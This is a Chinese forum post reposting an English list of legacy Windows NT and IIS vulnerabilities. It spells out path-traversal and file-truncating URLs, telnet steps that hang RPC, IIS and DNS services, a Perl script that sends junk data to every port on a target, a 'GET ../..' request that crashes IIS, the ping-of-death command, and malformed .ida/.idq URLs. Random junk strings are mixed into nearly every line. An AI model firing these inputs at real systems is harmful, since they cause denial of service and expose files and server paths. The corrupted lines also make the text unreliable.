找回密码
 注册

QQ登录

只需一步,快速开始

NT的漏洞及描述(英文)

[复制链接]
发表于 2011-1-13 17:12:25 | 显示全部楼层 |阅读模式
受影响系统:4.0,iis 1.0! T8 O- S: e# ^6 l' _* i3 U
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.; {: h% x4 E0 `' D

, y1 E! l: Q+ L/ B& E  jA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
. W0 {7 A* K% `' l
5 A9 a* c7 |( _  ~- [By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
6 N3 t5 h6 j6 ?. c' r" |0 x
& Z' D/ A5 K, m: w" K7 |* ^--------------------------------------------------------------------
( j) l4 u6 u) r5 Q$ G8 Z$ `; D/ k0 o4 `8 R
受影响系统:4.01 M" n2 F7 X2 E) J5 q
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
2 d9 B$ F, R) S7 I* Q8 V3 L& }* `. J$ M+ o
If the file 'target.bat' exists, the file will be truncated.
; f8 }  ~# ^7 _# Y) D; Y6 G) Y( g; X) L& T" R3 r
. y) G9 L  d! K; w& K
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
3 ~$ y" \# ^: l8 {4 j; s
; p3 s3 j& C8 N/ B/ _  G----------------------------------------------------------------------2 U/ J$ t  V6 N$ x

5 n& i2 p+ V7 A受影响系统:3.51,4.0
. N7 n5 B' I! ^Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
4 @( p2 U+ c3 Q! ^
) i' k- T3 X" m& |0 M" L: qThe following steps;7 y5 S0 N" H1 \0 [% _# ?" f3 z7 O

5 S; `% i7 D, {6 M9 TTelnet to an NT 4.0 system on port 135 0 I7 ?, |4 H$ m' A) a( f# i
Type about 10 characters followed by a <CR> " t; I1 u+ y* W! a0 g/ s
Exit Telnet
) A' m$ S" h$ ~+ f$ l; h5 C# Fresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.0 n( N# _0 T  F0 t2 T
( s# d% N# X& p7 R
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
. X0 N5 E. p( m  p- Q; X" w  N6 Q) W" X
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
/ v$ n* |- c% N  U3 H5 b- s+ d& m7 {7 Q
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
3 T3 ^( U- @& |. S- x
0 x  C' V; @/ _The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):7 N/ A7 B: x" T& c

9 }* j2 t( m/ `7 o4 I6 o/*begin poke code*/
/ R$ B6 }' J0 J+ ~0 g0 C$ J" t8 y5 X& S# b1 N" k; f
use Socket;& F7 ~8 C6 b' D( Q
use FileHandle;+ p" s+ D2 l' y: v8 ^2 U
require "chat2.pl";# J9 Y6 H; M- v6 W

0 h' ?2 G7 j: D$systemname = $ARGV[0] && shift;
2 C0 V9 M( L" W) s( y
: D0 z0 Z# J2 T! T9 W! I4 K. [9 Z; c$verbose = 1; # tell me what you're hitting
5 K% c/ K0 P" z! W8 @& v, t$ y; \$knownports = 1; # don't hit known problem ports
' X8 @- n3 h; M$ rfor ($port = $0; $port<65535; $port++)
3 C4 k; m7 Q: S+ D{* Z6 u6 T; t; `3 x# x' z

7 x+ B! X& T* c1 I  u; |* `$ m. Q4 }4 V: B3 J7 ?; S% G1 R
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
0 r  R" j( j2 i9 G$ p2 Enext;
9 X. ^9 f3 P" J}6 ]& z( d1 a, }. B
$fh = chat::open_port($systemname, $port);! l" i2 W% \# c# P  V
chat::print ($fh,"This is about ten characters or more");1 F/ m5 n0 |: [; f2 ?* j7 @
if ($verbose) {& g1 {6 t; o: V/ _
print "Trying port: $port\n";
1 I3 }: X6 ]  q}
( q# ~1 ]3 Y) q- L' D0 }chat::close($fh);; c; E( ?" a  L2 x$ g
$ P  x$ \$ l2 j* u( F& u/ ^6 a. ^1 N
}
  j; D! a# c  A/ H* }0 n$ A) V% \
6 X3 A. ^. s, D9 _7 z* B+ M& E8 y- L' c) K1 V
/*end poke code*/
  `$ j  s- V  p! W
( _/ Z: ^1 I0 A1 QSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername7 t8 W" F8 j  z5 r* \9 r/ E+ E
- Y  ]9 ~7 j. m
--------------------------------------------------------------------------------3 O7 c- O& A) O; M$ N- ]

  E  w5 [( K- j" T1 A' _/ E7 _受影响系统:4.0
; H9 P% g- e7 J8 J2 h4 a" u; `Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
" W, Z+ e' U6 Y, d% s2 G! ]/ ^/ U- m% ]% u4 }$ d7 o
This attack causes Dr. Watson to display an alert window and to log an error: 7 M# K9 [4 d3 [: Y4 N% Q. G% c

% @4 M" l. a2 ]* p. ]3 o: X! V"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
, g/ N+ K# v8 X
% e' A2 T0 w2 z$ Q+ ?$ m1 w4 ]; z--------------------------------------------------------------------------------
0 ]/ K$ `+ B; V- S8 w$ [2 o+ F! C3 G' Q& E
受影响系统:3.51,4.03 @, J% ~+ r3 P6 G+ ~* _- X' X5 [
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:& M' X4 z3 e- G2 M$ W& G
/ P4 f: U: b; X' J% D7 i% c3 w
STOP: 0X0000001E
! N( {  g' Q. J) p; ^8 d9 r4 WKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
# {% [3 Y9 n0 f. {4 r/ M- |
" r1 I/ O8 @# s5 B+ H-OR-
& E6 B0 D& @$ l2 R
# s& K2 k' y+ qSTOP: 0x0000000A
& y) o" W; K: `% KIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS/ z' ^" U1 y0 a3 r" M; v

$ B' A# X! c/ V" w, m) b; \NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
- W' B& {9 D$ b$ d- J: [0 B4 n& r' |$ _% {/ \  c6 O
--------------------------------------------------------------------------------
7 K: m" s! f# ~$ R9 W3 Z! ~* j0 b5 j4 O! A9 }' Q7 e1 Z% h! G) J  [& u+ u
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
( k& F3 n0 h, x& y% |# j! Q" _3 W, G: ~4 @* b4 j$ f7 H$ _0 J  Q2 n7 |+ w
--------------------------------------------------------
2 [: j+ p" J- t2 d- f. \
5 ]& B7 F8 [3 A0 aIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2026-3-16 14:49

Powered by Discuz! X3.5

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表